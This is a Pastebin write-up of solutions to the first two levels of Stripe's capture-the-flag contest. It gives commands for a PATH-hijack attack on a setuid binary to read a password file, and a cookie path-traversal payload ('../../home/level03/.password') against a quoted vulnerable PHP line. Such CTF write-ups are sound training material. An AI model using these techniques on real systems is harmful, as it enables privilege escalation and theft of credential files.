Stripe's Capture the Flag Solutions - Pastebin.com

2 min read Original article ↗

  1. Stripe "Capture the Flag" - SOLUTIONS

  3. Solution for the first two levels.

  5. Disclaimer: if you need to read this to solve either of the first two levels, you obviously do not have enough skills to solve many, if any, of the future levels. And you're definitely not going to be the first one to capture the final flag.

  7. If you enjoy a challenge, stop reading now ... !

  9. ...

  11. still here?

  13. ...

  15. okay, let's roll ...

  18. Level 01

  20. This level exploits a suid vulnerability. If you look at the source provided, you'll see the C code is making a "date" system call. The script we're going to execute runs as level02. We need to somehow get the script to output level02's password.

  22. Let's create our own "date" executable, then change the PATH variable so that it gets called first, before the system "date" executable.

  25. ( enter provided password)

  27. > mkdir /tmp/pwn-level-one-1234rand

  28. > cd /tmp/pwn-level-one-1234rand

  29. > vi date

  31. Set contents of date to:

  32. cat /home/level02/.password

  34. > chmod +x date

  35. > PATH=/tmp/pwn-level-one-1234rand:$PATH;

  36. > export PATH

  38. Now we run the script that's setuid as level02:

  39. > /levels/level01

  41. It should output Level 2's password! If not, you did something wrong.

  43. Level 2

  45. This one's even easier than the first one, if you're familiar with PHP & cookies. NOM NOM NOM

  47. Login as the level02 user using the password you obtained from the level01 sploit.

  49. Visit:

  51. http://ctf.stri.pe/level02.php

  53. Enter the level02 credentials.

  55. Back in ssh:

  57. > cat /var/www/level02.php

  59. Notice this line:

  61. $out = file_get_contents('/tmp/level02/'.$_COOKIE['user_details']);

  63. It gets executed if the cookie is already set.

  65. See the problem here?

  67. Cookies are stored client-side, so they can be fussed with. What if we changed the cookie to, oh, say ... "=../../etc/passwd" ?

  69. Note: you need the leading "=" for the cookie to be formatted properly.

  71. Using your favorite Cookie Editor (Chrome, Firefox, whatever), set the "user_details" cookie to:

  72. =../../home/level03/.password

  75. And re-submit the form. You should have your Level 3 password by now.

  78. Aaaand that's all, folks.

  80. I'll leave the higher levels sploits to the real hackers out there.